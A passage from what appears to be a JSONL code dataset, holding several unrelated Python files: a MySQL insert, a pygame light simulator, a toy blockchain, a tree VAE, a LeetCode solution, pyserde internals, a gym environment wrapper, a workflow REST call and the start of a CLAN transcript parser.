products(id,brand,category,price,title,review,rating,image_link,product_link,from_page_link)\"\\\n\t\t\"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\targs = [str(item) for item in data]\n\ttry:\n\t\tdb_config = read_db_config()\n\t\tconn = MySQLConnection(**db_config)\n\t\tcursor = conn.cursor()\n\t\tcursor.execute(query, args)\n\t\tconn.commit()\n\texcept Error as error:\n\t\tprint(error)\n\t\tprint(db_config)\n\t\tsys.exit(1)\n\tfinally:\n\t\tcursor.close()\n\t\tconn.close()\n\n\n","sub_path":"insert_tikidb.py","file_name":"insert_tikidb.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440439358","text":"\nimport sys, pygame, random, math, threading\nrandom.seed()\npygame.init()\npygame.font.init()\nfrom pygame.locals import *\n\nc_green = 0,255,0\nc_red = 255,0,0\nc_blue = 0,0,255\nc_white = 255,255,255\nc_black = 0,0,0\nc_darkgrey = 20,20,20\nc_lightgrey = 150,150,150\n\npos=[100,100]\nradius_array = [30,40,30,30,30,40,50,50,40,40,40]\nsize = width,height = 950,950\ncenter = width/2,height/2\npygame.display.set_caption(\"Fountain Simulation\")\nscreen = pygame.display.set_mode(size)\nscreen.fill(c_black)\nfont = pygame.font.SysFont(\"Arial\", 10)\n \nshowRings = False\nshowNumb = False\n\nlight_list = []\n\nclass Group:\n def __init__(self, sort, contents):\n self.contents = contents\n self.sort = sort\n if sort:\n self.contents = sorted(contents)\n\n def __getitem__(self, index):\n return self.contents[index]\n\n def __str__(self):\n return str(self.contents)\n \n def __repr__(self):\n return str(self.contents)\n\n def append(self, item):\n self.contents.append(item)\n \n def set_color(self, color):\n for light in self.contents:\n light.set_color(color)\n def length(self):\n return len(self.contents)\n \n @staticmethod\n def groupify (*args):\n l = list(args)\n return Group(False, l)\n\n @staticmethod \n def merge (sort, *args):\n l = []\n for arg in args:\n l.extend(arg.contents)\n return Group(sort, l)\n\nclass Light:\n def __init__(self, pos, radius, id_code, universe, real_id, color = c_lightgrey):\n self.color = color\n self.pos = pos\n self.radius = radius\n self.id_code = id_code\n self.universe = universe\n self.real_id = real_id\n\n def __cmp__(self, other):\n if self.id_code > other.id_code: return 1\n else: return -1\n\n def __str__(self):\n return str(self.id_code)\n\n def __repr__(self):\n return str(self.id_code)\n\n def set_color(self, color):\n self.color = color\n self.draw()\n #hayg.set_light(self.universe,(self.real_id*(3-2)),(self.real_id(3-1)),(self.real_id(3-0)),color[0],color[1],color[2]) \n def off():\n self.set_color(c_lightgrey)\n\n def draw(self):\n pygame.draw.circle(screen, self.color, self.pos, self.radius)\n if showNumb:\n local_label = font.render(str(self.id_code), 1, c_white)\n screen.blit(local_label, (self.pos[0],self.pos[1]))\n #real_label = font.render(str(self.real_id), 1, c_white)\n #screen.blit(real_label, (self.pos[0]-10,self.pos[1]-10))\n\ndef draw_rings(ring_thickness, number_of_rings, radius_array):\n for ring_numb in reversed(range (0,number_of_rings)):\n pygame.draw.circle(screen, c_darkgrey, center, radius_array[ring_numb]+ring_thickness)\n pygame.draw.circle(screen, c_black, center, radius_array[ring_numb])\n\n\ndef compute_lights(number_of_rings, ring_thickness, light_radius, radius_array):\n global light_list\n\n ring_zero_difference = (107-103, 162 ,3)\n ring_one_difference = (102-87, 175.5 ,3)\n ring_two_difference = (124-109, 198, 2)\n ring_three_difference = (86-71, 175.5, 3)\n ring_four_difference = (70-55, 198, 3)\n ring_five_difference = (108-65, 210.7, 2)\n ring_six_difference = (54-1, 210, 3)\n ring_seven_difference = (64-1, 209, 2)\n ring_eight_difference = (118-53, 209, 1)\n ring_nine_difference = (52-25, 145.6, 1, 60.0, 12/4, 7)\n ring_ten_difference = (24-17, 137.72, 1, 84.48, 65.45/4, 2) \n ring_array = [ring_zero_difference, ring_one_difference, ring_two_difference, ring_three_difference, ring_four_difference, ring_five_difference, ring_six_difference, ring_seven_difference, ring_eight_difference, ring_nine_difference, ring_ten_difference]\n light_id = 0\n count3 = 107\n count2 = 124\n count1 = 118\n\n for ring_number in range(number_of_rings):\n number_of_lights = ring_array[ring_number][0]+ 1\n acc_angle = 0\n for light_number in range (number_of_lights):\n if ring_number > 8:\n radians = -math.radians(360.0*light_number/(ring_array[ring_number][0]*ring_array[ring_number][4])) + math.radians(ring_array[ring_number][1])\n if light_number%ring_array[ring_number][5] == 0 and light_number != 0:\n acc_angle += math.radians(ring_array[ring_number][3] - (360.0/(ring_array[ring_number][0]*ring_array[ring_number][4])))\n x = (ring_thickness/2 + radius_array[ring_number])*math.cos(radians-acc_angle) + center[0]\n y = (ring_thickness/2 + radius_array[ring_number])*math.sin(radians-acc_angle) + center[1]\n else:\n radians = -math.radians(360.0*light_number/number_of_lights) + math.radians(ring_array[ring_number][1])\n x = (ring_thickness/2 + radius_array[ring_number])*math.cos(radians) + center[0]\n y = (ring_thickness/2 + radius_array[ring_number])*math.sin(radians) + center[1]\n uni_number = ring_array[ring_number][2]\n if uni_number == 3:\n light_list.append(Light((int(x),int(y)), light_radius, light_id, uni_number, count3))\n count3 -= 1\n elif uni_number == 2:\n light_list.append(Light((int(x),int(y)), light_radius, light_id, uni_number, count2))\n count2 -= 1\n else:\n light_list.append(Light((int(x),int(y)), light_radius, light_id, uni_number, count1))\n count1 -= 1\n\n light_id += 1\n\ndef draw_lights():\n for i in range (len(light_list)):\n light = light_list[i]\n light.draw()\n\ndef draw_diagram(ring_thickness, number_of_rings, light_radius, radius_array):\n for i in range(1,number_of_rings):\n radius_array[i] += radius_array[i-1] \n if showRings:\n draw_rings(ring_thickness, number_of_rings, radius_array)\n\n compute_lights(number_of_rings, ring_thickness, light_radius, radius_array)\n draw_lights()\n\ndef flush_pygame():\n pygame.display.flip()\n\n\"\"\"\ndef flush():\n for i in range(1,4)\n hayg.flush(i)\n\"\"\"\n \ndef init(should_show_ring, should_show_numb):\n global showRings, showNumb\n\n if should_show_ring:\n showRings = True\n if should_show_numb:\n showNumb = True\n draw_diagram(10,len(radius_array),8,radius_array)\n t = threading.Thread(target=keep_run)\n t.start()\n pygame.display.flip()\n\ndef keep_run():\n cont = True\n while cont:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: cont = False;\n pygame.quit()\n\n","sub_path":"simulator_coredumper.py","file_name":"simulator_coredumper.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"4078294","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nimport hashlib\n\nclass Block:\n\n def __init__(self, timestamp, data, previous_hash):\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.calc_hash(data)\n\n def calc_hash(self, data):\n sha = hashlib.sha256()\n hash_str = data.encode('utf-8')\n sha.update(hash_str)\n return sha.hexdigest()\n \n def update(self, timestamp, new_data):\n self.timestamp = timestamp\n self.data = new_data\n self.hash = self.calc_hash(new_data)\n \n def __repr__(self):\n return \"[Timestamp: {}, Data: {}, PrevHash: {}, Hash:{}]\".format(self.timestamp, self.data, self.previous_hash, self.hash)\n\nimport datetime \n\ntimestamp = datetime.datetime.now(datetime.timezone.utc).strftime(\"%H:%M %m/%d/%Y %Z\")\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n \n def get_node(self, value, prev_hash=None):\n block = Block(timestamp, value, prev_hash)\n return Node(block)\n \n def add(self, value):\n if not value:\n return 'Can\\'t add block without any data!'\n\n if self.head is None:\n self.head = self.get_node(value)\n self.tail = self.head \n return self.head.value.hash\n \n tail = self.tail\n tail.next = self.get_node(value, tail.value.hash)\n self.tail = tail.next\n\n return tail.next.value\n \n def get_latest(self):\n if self.head is None:\n return 'No record'\n \n tail = self.head\n while tail.next:\n tail = tail.next\n return tail.value.data\n \n def update(self, hash, new_data):\n tail = self.head\n while tail:\n if tail.value.hash == hash:\n tail.value.update(timestamp, new_data)\n return tail.value.data\n tail = tail.next\n return 'No record'\n \n def is_chain_valid(self):\n if self.head is None:\n return 'No record found'\n tail = self.head\n while tail.next:\n if tail.value.hash != tail.next.value.previous_hash:\n return False\n tail = tail.next\n \n return True\n\n def __str__(self):\n if self.head is None:\n return 'Blockchain empty!'\n cur_head = self.head\n out_string = \"\"\n while cur_head:\n out_string += str(cur_head.value.data) + \" -> \"\n cur_head = cur_head.next\n return out_string \n\n# Test case 1\n\nblockchain = LinkedList()\nprint(blockchain.add('data1'))\nprint(blockchain.add('data2'))\nprint(blockchain.add('data3'))\nprint(blockchain.add('data4'))\nprint('Blockchain : ', blockchain) # Expected: data1 -> data2 -> data3 -> data4 ->\nprint(blockchain.get_latest()) # Expected: data4\nprint(blockchain.is_chain_valid()) # Expected: True\n\n# Test case 2\n\nblockchain = LinkedList()\nprint(blockchain.add('input1'))\nprint(blockchain.add('input2'))\nprint(blockchain.add('input3'))\nprint('Blockchain : ', blockchain) # Expected: input1 -> input2 -> input3 ->\nprint(blockchain.is_chain_valid()) # Expected: True\nblockchain.update('124d8541ff3d7a18b95432bdfbecd86816b86c8265bff44ef629765afb25f06b', 'ZZZZ')\nprint('Blockchain : ', blockchain) # Expected: input1 -> ZZZZ -> input3 ->\nprint(blockchain.is_chain_valid()) # Expected: False\n\n# Test case 3\n\nblockchain = LinkedList()\nprint(blockchain.add('')) # Expected: Can't add block without any data!\nprint(blockchain.add(None)) # Expected: Can't add block without any data!\nprint(blockchain.add('input3')) # Expected: \n\n# Test case 4\n\nblockchain = LinkedList()\nprint(blockchain) # Expected: Blockchain empty!\n","sub_path":"problem_5.py","file_name":"problem_5.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"358086150","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport numpy as np\nfrom globals import device\n\nclass MLP(nn.Module):\n def __init__(self, ind, hdim, odim):\n super(MLP, self).__init__()\n self.l1 = nn.Linear(ind, hdim)\n self.l2 = nn.Linear(hdim, hdim)\n self.l3 = nn.Linear(hdim, odim)\n\n def forward(self, x):\n x = torch.tanh(self.l1(x))\n x = torch.tanh(self.l2(x))\n return self.l3(x)\n\n# VAE for trees represented as dicts with \"value\", \"left\", and \"right\" keys\nclass VAE(nn.Module):\n def __init__(self, hidden_dim, latent_dim, vocab_size, max_len):\n super(VAE, self).__init__()\n\n self.hidden_dim = hidden_dim\n self.latent_dim = latent_dim\n self.vocab_size = vocab_size\n self.max_len = max_len\n\n self.log_sigma = torch.nn.Parameter(torch.full((1,), 0)[0], requires_grad=True)\n\n # encoding\n self.embed = nn.Embedding(self.vocab_size, hidden_dim)\n # self.encode_union = MLP(3*hidden_dim, hidden_dim, hidden_dim)\n # self.encode_intersect = MLP(3*hidden_dim, hidden_dim, hidden_dim)\n # self.encode_subtract = MLP(3*hidden_dim, hidden_dim, hidden_dim)\n # self.encode_mu = MLP(hidden_dim, hidden_dim, latent_dim)\n # self.encode_logvar = MLP(hidden_dim, hidden_dim, latent_dim)\n #\n # # decoding\n # self.node_type = MLP(latent_dim, hidden_dim, self.vocab_size)\n # self.decode_union = MLP(latent_dim, hidden_dim, 2*latent_dim)\n # self.decode_intersect = MLP(latent_dim, hidden_dim, 2*latent_dim)\n # self.decode_subtract = MLP(latent_dim, hidden_dim, 2*latent_dim)\n self.encode_union = nn.Linear(2*hidden_dim, hidden_dim)\n self.encode_intersect = nn.Linear(2*hidden_dim, hidden_dim)\n self.encode_subtract = nn.Linear(2*hidden_dim, hidden_dim)\n self.encode_mu = nn.Linear(hidden_dim, latent_dim)\n self.encode_logvar = nn.Linear(hidden_dim, latent_dim)\n\n # decoding\n self.node_type = nn.Linear(latent_dim, self.vocab_size)\n self.decode_union = nn.Linear(latent_dim, 2*latent_dim)\n self.decode_intersect = nn.Linear(latent_dim, 2*latent_dim)\n self.decode_subtract = nn.Linear(latent_dim, 2*latent_dim)\n\n def encode(self, tree):\n def traverse(node):\n # leaf\n if node[\"right\"] is None and node[\"left\"] is None:\n return torch.tanh(self.embed(node[\"value\"]))\n # internal\n else:\n lchild = traverse(node[\"left\"])\n rchild = traverse(node[\"right\"])\n input = torch.cat([lchild, rchild], 0)\n if node[\"value\"] == 396:\n return torch.tanh(self.encode_union(input))\n elif node[\"value\"] == 397:\n return torch.tanh(self.encode_intersect(input))\n elif node[\"value\"] == 398:\n return torch.tanh(self.encode_subtract(input))\n else:\n assert(False)\n\n h = traverse(tree)\n return self.encode_mu(h), self.encode_logvar(h)\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self, z, tree=None):\n # returns decoded tree and a list of predicted node types\n # (for training node_type classifier), teacher forces tree structure\n def traverse_train(node, code):\n # leaf\n if node[\"right\"] is None and node[\"left\"] is None:\n return {\"value\": self.node_type(code), \"left\": None, \"right\": None}\n # internal\n else:\n if node[\"value\"] == 396:\n par_out = torch.tanh(self.decode_union(code))\n elif node[\"value\"] == 397:\n par_out = torch.tanh(self.decode_intersect(code))\n elif node[\"value\"] == 398:\n par_out = torch.tanh(self.decode_subtract(code))\n else:\n assert(False)\n lchild = traverse_train(node[\"left\"], par_out[:self.latent_dim])\n rchild = traverse_train(node[\"right\"], par_out[self.latent_dim:])\n return {\"value\": self.node_type(code), \"left\": lchild, \"right\": rchild}\n\n # returns decoded tree given just a latent code at test time\n def traverse_test(code, max_depth):\n type = self.node_type(code)\n token = torch.argmax(type)\n # leaf\n if token < 396 or max_depth == 1:\n zeroed_type = type\n zeroed_type[396:] = 0\n return {\"value\": zeroed_type, \"left\": None, \"right\": None}\n # internal\n else:\n if token == 396:\n par_out = torch.tanh(self.decode_union(code))\n elif token == 397:\n par_out = torch.tanh(self.decode_intersect(code))\n elif token == 398:\n par_out = torch.tanh(self.decode_subtract(code))\n else:\n assert(False)\n lchild = traverse_test(par_out[:self.latent_dim], max_depth - 1)\n rchild = traverse_test(par_out[self.latent_dim:], max_depth - 1)\n return {\"value\": type, \"left\": lchild, \"right\": rchild}\n\n if tree is not None:\n return traverse_train(tree, z)\n else:\n # depth of 7 is enough to generate max_len=13 programs\n # todo: don't hardcode this\n return traverse_test(z, 7)\n\n def forward(self, x):\n mu, logvar = self.encode(x)\n z = self.reparameterize(mu, logvar)\n return self.decode(z, x), mu, logvar\n\n # Reconstruction + KL divergence losses\n def loss_function(self, recon_x, x, mu, logvar, beta):\n # returns flattened tree and target node types\n def flatten(node):\n if node[\"right\"] is None and node[\"left\"] is None:\n return [node[\"value\"]]\n else:\n lchild = flatten(node[\"left\"])\n rchild = flatten(node[\"right\"])\n return [node[\"value\"]] + lchild + rchild\n\n flat_x = flatten(x)\n flat_recon_x = flatten(recon_x)\n # print(torch.stack(flat_x))\n # print(torch.argmax(torch.stack(flat_recon_x), dim=1))\n\n CE = F.cross_entropy(torch.stack(flat_recon_x), torch.stack(flat_x), reduction='sum')\n #CE = gaussian_nll(torch.stack(flat_recon_x), softclip(self.log_sigma, -6), F.one_hot(torch.stack(flat_x), 399)).sum()\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\n # KLD *= .01\n # print(CE/KLD)\n return CE + beta * KLD, CE, KLD\n\ndef gaussian_nll(mu, log_sigma, x):\n return 0.5 * torch.pow((x - mu) / log_sigma.exp(), 2) + log_sigma + 0.5 * np.log(2 * np.pi)\n\ndef softclip(tensor, min):\n result_tensor = min + F.softplus(tensor - min)\n\n return result_tensor\n","sub_path":"old/vae_tree_reduced.py","file_name":"vae_tree_reduced.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298288274","text":"# 好题!!用时40分钟\r\nclass Solution(object):\r\n def checkPossibility(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: bool\r\n \"\"\"\r\n length = len(nums)\r\n if length <= 1:\r\n return True \r\n change = -1\r\n change_prev = -1\r\n for i in range(1, length - 1):\r\n a, b, c = nums[i - 1], nums[i], nums[i + 1]\r\n if a <= b <= c:\r\n continue\r\n elif b >= a and b >= c:\r\n if a <= c:\r\n change = i + 0.5 # b decrese or c increase\r\n else: # a > c\r\n change = i + 1 # c increase\r\n elif b <= a and b <= c:\r\n if a <= c:\r\n change = i - 0.5 # b increase or a decrease\r\n else:\r\n change = i - 1 # a decrease\r\n else: # a > b > c\r\n return False\r\n # print(i, change)\r\n if change_prev >= 0:\r\n # x.5 means interval [x, x + 1]\r\n diff = abs(change_prev - change)\r\n if diff > 1: # change at least two \r\n return False\r\n elif diff == 1:\r\n if int(change) == change:\r\n return False\r\n else:\r\n change_prev = int(max(change, change_prev))\r\n # if both of them are interval: changable, choose the intersection\r\n else:\r\n change_prev = change\r\n # print(change)\r\n return True\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # inputs\r\n nums = [4,2,3,4,5,6]\r\n # nums = [4,2,3]\r\n nums = [4,2,1]\r\n # nums = [3,4,2,3]\r\n nums = [1,5,4,6,7,8,9] # true\r\n nums = [-1,4,2,3]\r\n print('-' * 30)\r\n res = Solution().checkPossibility(nums)\r\n print(res)","sub_path":"665_checkPossibility.py","file_name":"665_checkPossibility.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"84122552","text":"\"\"\"\npyserde core module.\n\"\"\"\nimport dataclasses\nimport logging\nfrom dataclasses import dataclass, field, is_dataclass\nfrom typing import Any, Callable, Dict, Iterator, List, Optional, Type, TypeVar\n\nimport stringcase\n\nfrom .compat import T, assert_type, is_dict, is_list, is_opt, is_tuple, is_union, type_args\n\n__all__: List = []\n\nlogger = logging.getLogger('serde')\n\nJsonValue = TypeVar('JsonValue', str, int, float, bool, Dict, List)\n\nFROM_ITER = '__serde_from_iter__'\n\nFROM_DICT = '__serde_from_dict__'\n\nTO_ITER = '__serde_to_iter__'\n\nTO_DICT = '__serde_to_dict__'\n\nHIDDEN_NAME = '__serde_hidden__'\n\nSETTINGS = dict(debug=False)\n\n\n@dataclass\nclass Hidden:\n \"\"\"\n Hidden information encoded in serde classes.\n \"\"\"\n\n code: Dict[str, str] = field(default_factory=dict)\n\n\ndef init(debug: bool = False):\n SETTINGS['debug'] = debug\n\n\nclass SerdeError(TypeError):\n \"\"\"\n Serde error class.\n \"\"\"\n\n\ndef gen(code: str, globals: Dict = None, locals: Dict = None, cls: Type = None) -> str:\n \"\"\"\n Customized `exec` function.\n \"\"\"\n try:\n from black import format_str, FileMode\n\n code = format_str(code, mode=FileMode(line_length=100))\n except Exception:\n pass\n for_class = 'for ' + cls.__name__ if cls else ''\n logger.debug(f'Generating {for_class} ...\\n{code}')\n exec(code, globals, locals)\n return code\n\n\ndef typecheck(cls: Type[T], obj: T) -> None:\n \"\"\"\n type check type-annotated classes.\n\n >>> @dataclass\n ... class Foo:\n ... s: str\n >>>\n >>> typecheck(Foo, Foo('foo'))\n >>>\n >>> # Type mismatch raises `ValueError`.\n >>> try:\n ... typecheck(Foo, Foo(10))\n ... except:\n ... pass\n >>>\n \"\"\"\n if is_dataclass(obj):\n # If dataclass, type check recursively.\n for f in dataclasses.fields(obj):\n typecheck(f.type, getattr(obj, f.name, None))\n elif is_opt(cls):\n if obj is not None:\n typ = type_args(cls)[0]\n typecheck(typ, obj)\n elif is_union(cls):\n success = False\n for typ in type_args(cls):\n try:\n typecheck(typ, obj)\n success = True\n break\n except (SerdeError, ValueError):\n pass\n if not success:\n raise ValueError(f'{obj} is not instance of {cls}')\n elif is_list(cls):\n assert_type(list, obj)\n if isinstance(obj, list):\n typ = type_args(cls)[0]\n for e in obj:\n typecheck(typ, e)\n elif is_tuple(cls):\n assert_type(tuple, obj)\n if isinstance(obj, tuple):\n for i, typ in enumerate(type_args(cls)):\n typecheck(typ, obj[i])\n elif is_dict(cls):\n assert_type(dict, obj)\n if isinstance(obj, dict):\n ktyp = type_args(cls)[0]\n vtyp = type_args(cls)[1]\n for k, v in obj.items():\n typecheck(ktyp, k)\n typecheck(vtyp, v)\n else:\n if not isinstance(obj, cls):\n raise ValueError(f'{obj} is not instance of {cls}')\n\n\n@dataclass\nclass Func:\n \"\"\"\n Function wrapper that has `mangled` optional field.\n\n pyserde copies every function reference into global scope\n for code generation. Mangling function names is needed in\n order to avoid name conflict in the global scope when\n multiple fields receives `skip_if` attribute.\n \"\"\"\n\n inner: Callable[[Any], bool]\n mangeld: str = \"\"\n\n def __call__(self, v) -> bool:\n return self.inner(v) # type: ignore\n\n @property\n def name(self) -> str:\n return self.mangeld\n\n\ndef skip_if_false(v):\n return not bool(v)\n\n\n@dataclass\nclass Field:\n \"\"\"\n Field in pyserde class.\n \"\"\"\n\n type: Type\n name: Optional[str]\n default: Any = field(default_factory=dataclasses._MISSING_TYPE)\n default_factory: Any = field(default_factory=dataclasses._MISSING_TYPE)\n case: Optional[str] = None\n rename: Optional[str] = None\n skip: Optional[bool] = None\n skip_if: Optional[Func] = None\n skip_if_false: Optional[bool] = None\n\n @classmethod\n def from_dataclass(cls, f: dataclasses.Field) -> 'Field':\n skip_if_false_func: Optional[Func] = None\n if f.metadata.get('serde_skip_if_false'):\n skip_if_false_func = Func(skip_if_false, cls.mangle(f, 'skip_if'))\n\n skip_if: Optional[Func] = None\n if f.metadata.get('serde_skip_if'):\n func = f.metadata.get('serde_skip_if')\n if callable(func):\n skip_if = Func(func, cls.mangle(f, 'skip_if'))\n\n return cls(\n f.type,\n f.name,\n default=f.default,\n default_factory=f.default_factory, # type: ignore\n rename=f.metadata.get('serde_rename'),\n skip=f.metadata.get('serde_skip'),\n skip_if=skip_if or skip_if_false_func,\n )\n\n @staticmethod\n def mangle(field: dataclasses.Field, name: str) -> str:\n \"\"\"\n Get mangled name based on field name.\n \"\"\"\n return f'{field.name}_{name}'\n\n\ndef fields(FieldCls: Type, cls: Type) -> Iterator[Field]:\n return iter(FieldCls.from_dataclass(f) for f in dataclasses.fields(cls))\n\n\ndef conv(f: Field, case: Optional[str] = None) -> str:\n \"\"\"\n Convert field name.\n \"\"\"\n name = f.name\n if case:\n casef = getattr(stringcase, case or '', None)\n if not casef:\n raise SerdeError(\n (f\"Unkown case type: {f.case}.\" f\"Pass the name of case supported by 'stringcase' package.\")\n )\n name = casef(f.name)\n if f.rename:\n name = f.rename\n if name is None:\n raise SerdeError('Field name is None.')\n return name\n","sub_path":"serde/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199341673","text":"import numpy as np\nfrom veca.gym.core.environment import EnvModule\n\nIMG_H, IMG_W = 84, 84\n\ndef wav2freq(wav):\n wav0, wav1 = wav[0], wav[1]\n wav0 = abs(np.fft.rfft(wav0))[:250]\n wav0 = np.log10(wav0 + 1e-8)\n wav1 = abs(np.fft.rfft(wav1))[:250]\n wav1 = np.log10(wav1 + 1e-8)\n wav = np.array([wav0, wav1])\n #print(np.max(wav0), np.max(wav1))\n return wav\n\nclass Environment(EnvModule):\n def __init__(self, num_envs, ip,port,args):\n EnvModule.__init__(self, num_envs, ip,port,args)\n self.num_envs = num_envs\n \n def step(self, action):\n data = super().step(action)\n rewards, done, info = [], [], []\n imgs, wavs = [], []\n for i in range(self.num_envs):\n img = list(reversed(data['img'][i]))\n wav = data['wav'][i]\n doneA = data['done'][i][0]\n reward = data['reward'][i][0]\n pos = data['pos'][i]\n img = np.reshape(np.array(img), [6, IMG_H, IMG_W]) / 255.0\n wav = np.reshape(np.array(wav), [2, -1]) / 32768.0 \n wav = wav2freq(wav)\n imgs.append(img)\n wavs.append(wav)\n rewards.append(reward)\n if doneA: done.append(True)\n else: done.append(False)\n info.append(pos)\n imgs, wavs = np.array(imgs), np.array(wavs)\n obs = (imgs, wavs)\n return (obs, rewards, done, info)\n\n\n","sub_path":"veca/gym/kicktheball/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"502741117","text":"import requests\nimport json\nfrom fastjsonschema import *\nfrom Workflow_Django.settings import CONSTANT_URL\nfrom workflow_vault.exceptions import WorkflowException\ndef initiateWorkflow(body):\n # print(type(body))\n correct = False\n for k in body.keys():\n v = body.get(k)\n if v and v.strip():\n correct = True\n else:\n data = v\n correct = False\n break\n if(correct):\n containerID = body['container-id']\n processID = body['process-id']\n URL = CONSTANT_URL+'containers/'+containerID+'/processes/'+processID+'/instances'\n header = {'Content-type':'application/json'}\n response = requests.post(URL, headers = header, json = body).json()\n return response\n else:\n raise WorkflowException(404, \"Validation error\", \" Mandatory field is missing\")","sub_path":"workflow_vault/workflowInitiation/workflowInitiate/initiateWorkflow.py","file_name":"initiateWorkflow.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"184226584","text":"command = input()\r\nheros = {}\r\n\r\nwhile command != 'End':\r\n if command.split(' ')[0] == 'Enroll':\r\n hero_name = command.split(' ')[1]\r\n if hero_name not in heros:\r\n heros[hero_name] = []\r\n else:\r\n print(f'{hero_name} is already enrolled.')\r\n if command.split(' ')[0] == 'Learn':\r\n hero_name = command.split(' ')[1]\r\n spell = command.split(' ')[2]\r\n if hero_name not in heros:\r\n print(f'{hero_name} doesn\\'t exist.')\r\n else:\r\n if spell in heros[hero_name]:\r\n print(f'{hero_name} has already learnt {spell}.')\r\n else:\r\n heros[hero_name].append(spell)\r\n if command.split(' ')[0] =='Unlearn':\r\n hero_name = command.split(' ')[1]\r\n spell = command.split(' ')[2]\r\n if hero_name not in heros:\r\n print(f'{hero_name} doesn\\'t exist.')\r\n else:\r\n if spell not in heros[hero_name]:\r\n print(f'{hero_name} doesn\\'t know {spell}.')\r\n else:\r\n heros[hero_name].remove(spell)\r\n command = input()\r\n\r\nordered_heros = sorted(heros.items(), key=lambda s: (-len(s[1]), s[0]))\r\n\r\nprint('Heroes:')\r\n\r\nfor name, spells in ordered_heros:\r\n print(f'== {name}:', end=' ' )\r\n print(', '.join(spells))","sub_path":"PyCharm_projects_2020/Fundamentals/Exam_prep/hero_recruitment.py","file_name":"hero_recruitment.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"598364345","text":"\nimport csv\nimport os\n\nfrom pyclan import filters\nfrom pyclan import elements\n\nclass ClanFile(object):\n\n get_user_comments = filters.user_comments\n get_conv_block = filters.conv_block\n get_conv_blocks = filters.conv_blocks\n # get_paus_block = filters.paus_block\n # get_paus_blocks = filters.paus_blocks\n get_tiers = filters.tier\n get_within_time = filters.time\n get_with_keyword = filters.get_with_keyword\n replace_with_keyword = filters.replace_with_keyword\n\n end_tag = \"@End\"\n\n def __init__(self, path):\n self.clan_path = path\n self.filename = os.path.basename(self.clan_path)\n self.num_full_blocks = 0\n self.full_block_range = False\n self.block_index = [] # list of all the full block indices in this file\n self.line_map = self.parse_file()\n\n def parse_file(self):\n line_map = []\n with open(self.clan_path, \"rU\") as input:\n current_conv_block = 0\n current_paus_block = 0\n \n conv_block_started = False\n conv_block_ended = False\n\n last_conv_block_type = \"\"\n last_conv_block_num = 0\n # no_conv_block_start = False\n # no_conv_block_end = False\n\n paus_block_started = False\n paus_block_ended = False\n\n last_line = None\n for index, line in enumerate(input):\n clan_line = elements.ClanLine(index, line)\n #print line\n\n if line.startswith(\"@\") or index < 11:\n block_delimiter = False\n if line.startswith(\"@Bg\") or line.startswith(\"@Eg\"):\n conv_block_regx_result = elements.block_regx.search(line)\n paus_block_regx_result = elements.pause_regx.search(line)\n if conv_block_regx_result:\n current_conv_block = int(conv_block_regx_result.group(1))\n block_delimiter = True\n if \"@Bg\" in line:\n last_conv_block_type = \"@Bg\"\n last_conv_block_num = current_conv_block\n conv_block_started = True\n conv_block_ended = False\n if \"@Eg\" in line:\n if last_conv_block_type == \"@Bg\" and last_conv_block_num == current_conv_block:\n self.num_full_blocks += 1\n self.block_index.append(current_conv_block)\n last_conv_block_type = \"@Eg\"\n last_conv_block_num = current_conv_block\n conv_block_started = False\n conv_block_ended = True\n clan_line.is_conv_block_delimiter = True\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n line_map.append(clan_line)\n last_line = clan_line\n continue\n clan_line.is_conv_block_delimiter = block_delimiter\n if conv_block_started:\n clan_line.conv_block_num = current_conv_block\n clan_line.within_conv_block = True\n else:\n clan_line.conv_block_num = 0\n line_map.append(clan_line)\n last_line = clan_line\n continue\n\n clan_line.is_header = True\n if \"@End\" in line:\n clan_line.is_end_header = True\n clan_line.time_onset = None\n clan_line.time_offset = None\n line_map.append(clan_line)\n last_line = clan_line\n continue\n\n if line.startswith(\"\\t\"):\n if last_line.is_user_comment or last_line.is_tier_line:\n last_line.is_multi_parent = True\n clan_line.multi_line_parent = last_line\n if last_line.is_tier_line:\n clan_line.is_tier_line = True\n clan_line.tier = clan_line.multi_line_parent.tier\n else:\n clan_line.multi_line_parent = last_line.multi_line_parent\n if clan_line.multi_line_parent.is_tier_line:\n clan_line.is_tier_line = True\n clan_line.tier = clan_line.multi_line_parent.tier\n\n if line.startswith(\"%com:\") or line.startswith(\"%xcom:\"):\n if line.count(\"|\") > 3:\n clan_line.clan_comment 